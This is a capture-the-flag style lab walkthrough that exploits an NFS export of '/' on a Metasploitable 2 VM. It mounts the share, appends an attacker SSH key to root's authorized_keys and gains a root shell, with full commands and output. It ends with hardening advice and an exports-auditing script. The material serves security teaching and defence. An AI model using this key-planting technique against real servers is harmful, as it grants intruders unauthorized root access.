Metasploitable 2 server: Exploiting a Misconfigured NFS Share

NFS (Network File System) is a protocol that lets users share directories and files over the network across different operating systems. Once a share is mounted, the remote file system appears as a local directory. What a client can do with a share depends on the privileges assigned to that export.

Goal: Gain unauthorized access to sensitive data or obtain a shell on the system.

From the previous chapter, we found that ports 111 and 2049 are open:

PORT     STATE SERVICE     VERSION
111/tcp  open  rpcbind     2 (RPC #100000)
2049/tcp open  nfs         2-4 (RPC #100003)

Let's examine the Metasploitable 2 server again, this time with the help of the Nmap scripting engine:

┌─[mrdev@mr-dev]─[~]
└──╼ $sudo nmap -sC -sV --script=nfs-ls 192.168.56.3 -p 111,2049
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 16:16 IST
Nmap scan report for 192.168.56.3
Host is up (0.0017s latency).

PORT     STATE SERVICE VERSION
111/tcp  open  rpcbind 2 (RPC #100000)
| nfs-ls: Volume /
|   access: Read Lookup Modify Extend Delete NoExecute
| PERMISSION  UID  GID  SIZE   TIME                 FILENAME
| drwxr-xr-x  0    0    4096   2012-05-14T03:35:33  bin
| drwxr-xr-x  0    0    4096   2010-04-16T06:16:02  home
| drwxr-xr-x  0    0    4096   2010-03-16T22:57:40  initrd
| lrwxrwxrwx  0    0    32     2010-04-28T20:26:18  initrd.img
| drwxr-xr-x  0    0    4096   2012-05-14T03:35:22  lib
| drwx------  0    0    16384  2010-03-16T22:55:15  lost+found
| drwxr-xr-x  0    0    4096   2010-03-16T22:55:52  media
| drwxr-xr-x  0    0    4096   2010-04-28T20:16:56  mnt
| drwxr-xr-x  0    0    4096   2012-05-14T01:54:53  sbin
| drwxr-xr-x  0    0    4096   2010-04-28T04:06:37  usr
|_
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      36117/udp   mountd
|   100005  1,2,3      48262/tcp   mountd
|   100021  1,3,4      34178/udp   nlockmgr
|   100021  1,3,4      39330/tcp   nlockmgr
|   100024  1          36509/tcp   status
|_  100024  1          43134/udp   status
2049/tcp open  nfs     2-4 (RPC #100003)
MAC Address: 08:00:27:52:1E:51 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
┌─[mrdev@mr-dev]─[~]
└──╼ $

We see that both ports are open, and the nfs-ls script on port 111 lists a “/” volume exported over NFS that we can try to mount. The “/” file system is normally owned by root, so if we are allowed to mount the “/” export we will be able to read root's files and possibly write to them as well.


Mounting the '/' share

Let’s start mounting the “/” share and see what type of privileges we have. 

1. We will first create a new directory locally under “/mnt”; I'll call it metasploitable_share for the sake of this demo.

┌─[mrdev@mr-dev]─[~]
└──╼ $sudo mkdir -p /mnt/metasploitable_share
[sudo] password for mrdev: 
┌─[mrdev@mr-dev]─[~]
└──╼ $cd /mnt/
┌─[mrdev@mr-dev]─[/mnt]
└──╼ $ls
total 4
drwxr-xr-x  1 root root   40 Jan 20 18:10 .
drwxr-xr-x  1 root root  292 Jan 12 21:05 ..
drwxr-xr-x 21 root root 4096 May 21  2012 metasploitable_share

2. Mount the remote NFS share “/” locally with the Linux mount utility. Before that, make sure you have superuser privileges:

┌─[mrdev@mr-dev]─[/mnt]
└──╼ $sudo su
┌─[✗]─[root@mr-dev]─[/mnt]
└──╼ #sudo mount -t nfs 192.168.56.3:/ /mnt/metasploitable_share/
┌─[root@mr-dev]─[/mnt]
└──╼ #

3. After a successful mount, you can list the directories and files in the metasploitable_share directory:

┌─[root@mr-dev]─[/mnt]
└──╼ #cd metasploitable_share/
┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #ls -al
total 124
drwxr-xr-x 21 root root  4096 May 21  2012 .
drwxr-xr-x  1 root root    40 Jan 20 18:10 ..
drwxr-xr-x  2 root root  4096 May 14  2012 bin
drwxr-xr-x  3 root root  4096 Apr 29  2010 boot
lrwxrwxrwx  1 root root    11 Apr 29  2010 cdrom -> media/cdrom
drwxr-xr-x  2 root root  4096 Apr 29  2010 dev
drwxr-xr-x 94 root root  4096 Jan 20 14:55 etc
drwxr-xr-x  6 root root  4096 Apr 16  2010 home
drwxr-xr-x  2 root root  4096 Mar 17  2010 initrd
lrwxrwxrwx  1 root root    32 Apr 29  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root  4096 May 14  2012 lib
drwx------  2 root root 16384 Mar 17  2010 lost+found
drwxr-xr-x  4 root root  4096 Mar 17  2010 media
drwxr-xr-x  3 root root  4096 Apr 29  2010 mnt
-rw-------  1 root root 31056 Jan 20 14:55 nohup.out
drwxr-xr-x  2 root root  4096 Mar 17  2010 opt
dr-xr-xr-x  2 root root  4096 Apr 29  2010 proc
drwxr-xr-x 13 root root  4096 Jan 20 14:55 root
drwxr-xr-x  2 root root  4096 May 14  2012 sbin
drwxr-xr-x  2 root root  4096 Mar 17  2010 srv
drwxr-xr-x  2 root root  4096 Apr 29  2010 sys
drwxrwxrwt  6 root root  4096 Jan 20 16:55 tmp
drwxr-xr-x 12 root root  4096 Apr 28  2010 usr
drwxr-xr-x 14 root root  4096 Mar 17  2010 var
lrwxrwxrwx  1 root root    29 Apr 29  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #

4. Let's change into the root/.ssh directory of the share and list the files and directories:

┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #cd root/.ssh/
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #ls -al
total 16
drwxr-xr-x  2 root root 4096 May 20  2012 .
drwxr-xr-x 13 root root 4096 Jan 20 14:55 ..
-rw-r--r--  1 root root  405 May 18  2010 authorized_keys
-rw-r--r--  1 root root  442 May 20  2012 known_hosts
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #

From the above, we have found that there is an authorized_keys file.

An authorized key in SSH is a public key used to grant login access to a user. The authentication mechanism is called public-key authentication. Authorized keys are configured separately for each user, usually in the .ssh/authorized_keys file in the user's home directory.
So, we have to generate an SSH key pair locally on the testing machine.

5. Open a second terminal and run the commands below to generate an SSH key pair.

┌─[mrdev@mr-dev]─[~]
└──╼ $sudo su          # To enable sudo privileges
[sudo] password for mrdev: 
┌─[root@mr-dev]─[/home/mrdev]
└──╼ #cd /mnt/         # Change directory to /mnt 
┌─[root@mr-dev]─[/mnt]
└──╼ #ssh-keygen -t rsa           # Generate SSH key_pair
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): meta2_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in meta2_rsa
Your public key has been saved in meta2_rsa.pub
The key fingerprint is:
SHA256:1V9dnse3V9W8DfBkdIAF/PmM01NqcSP/zGFfVAwuyrY root@mr-dev
The key's randomart image is:
+---[RSA 3072]----+
|           .o*B==|
|           .o=.+X|
|          . o.o+%|
|         o . +++X|
|        S +   +@+|
|         . .  ==*|
|          E  ..+*|
|                =|
|                 |
+----[SHA256]-----+
┌─[root@mr-dev]─[/mnt]
└──╼ #ls -al           # Check if key_pair created or not
total 12
drwxr-xr-x  1 root root   84 Jan 20 18:27 .
drwxr-xr-x  1 root root  292 Jan 12 21:05 ..
-rw-------  1 root root 2590 Jan 20 18:27 meta2_rsa
-rw-r--r--  1 root root  565 Jan 20 18:27 meta2_rsa.pub
drwxr-xr-x 21 root root 4096 May 21  2012 metasploitable_share
┌─[root@mr-dev]─[/mnt]
└──╼ #

6. Copy the meta2_rsa.pub file to the mounted share (/mnt/metasploitable_share/root/.ssh):

┌─[root@mr-dev]─[/mnt]
└──╼ #cp /mnt/meta2_rsa.pub /mnt/metasploitable_share/root/.ssh/
┌─[root@mr-dev]─[/mnt]
└──╼ #

7. Go back to the first terminal (still in the share's root/.ssh directory) and run ls to list the files and directories:

┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #ls -al
total 20
drwxr-xr-x  2 root root 4096 Jan 20 18:30 .
drwxr-xr-x 13 root root 4096 Jan 20 14:55 ..
-rw-r--r--  1 root root  405 May 18  2010 authorized_keys
-rw-r--r--  1 root root  442 May 20  2012 known_hosts
-rw-r--r--  1 root root  565 Jan 20 18:30 meta2_rsa.pub
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #

8. Append the meta2_rsa.pub content to authorized_keys:

┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #cat meta2_rsa.pub >> authorized_keys 
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
ssh-rsa [key data omitted] root@mr-dev
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #

9. Go back to the second terminal (in /mnt) and connect to the Metasploitable machine with the SSH key created earlier.

┌─[root@mr-dev]─[/mnt]
└──╼ #ssh -i meta2_rsa root@192.168.56.3
The authenticity of host '192.168.56.3 (192.168.56.3)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.3' (RSA) to the list of known hosts.
Last login: Thu Jan 20 04:25:40 2022 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# 

As we see, we can connect to the machine as root.


Prevention

  • Restrict every NFS export to the specific hosts or subnets that need it; never export to “*”. 
  • Export read-only (ro) wherever possible. 
  • Do not export home directories, and never export “/”. 
  • Keep the “root_squash” export option (the default) so that a remote root user is mapped to an unprivileged user instead of keeping uid 0 on the share; it is the absence of root squashing that allowed the write into /root/.ssh above. 
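The export options listed above can be checked mechanically. The POSIX shell audit below is an added example, not part of the original post: it parses a constructed /etc/exports file containing a weak export next to a hardened one and flags unrestricted clients, writable exports, no_root_squash, and exports of “/”, /root or home directories. The exports file contents and its location are constructed for the demo.

```shell
#!/bin/sh
# Added example: audit /etc/exports for the weaknesses this walkthrough relies on.

# Write a constructed exports file (weak export next to a hardened one) to $1.
write_sample_exports() {
    cat > "$1" <<'EOF'
# weak: anyone may mount "/" read-write and keep uid 0 on the server
/ *(rw,no_root_squash)
# hardened: one subnet, read-only, root mapped to nobody (root_squash is the default)
/srv/export 192.168.56.0/24(ro,root_squash)
EOF
}

# Print one line per problem found, as "<path> <client> <problem>".
audit_exports() {
    # Strip comments and blank lines; each remaining line is "<path> <host>(<opts>) ...".
    # set -f keeps a "*" client spec from being expanded as a filename glob.
    sed -e 's/#.*//' "$1" | awk 'NF' | ( set -f; while read -r path specs; do
        for spec in $specs; do
            client=${spec%%\(*}                       # host part, empty for a bare "(opts)"
            opts=${spec#"$client"}; opts=${opts#\(}; opts=${opts%\)}
            case "$client" in
                ''|'*') client='*'; echo "$path $client unrestricted-clients" ;;
            esac
            case ",$opts," in *,rw,*) echo "$path $client writable" ;; esac
            case ",$opts," in *,no_root_squash,*) echo "$path $client no_root_squash" ;; esac
            case "$path" in /|/root|/home|/home/*) echo "$path $client sensitive-path" ;; esac
        done
    done )
}

# Exit status 0 when the file produced no findings, 1 otherwise.
exports_are_safe() {
    [ -z "$(audit_exports "$1")" ]
}

tmp=$(mktemp)
write_sample_exports "$tmp"
audit_exports "$tmp"          # prints four findings, all for the "/" export
rm -f "$tmp"
```

Run it against the real /etc/exports on an NFS server; an empty result means none of the four weak patterns is present, though it does not replace reviewing the file by hand.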
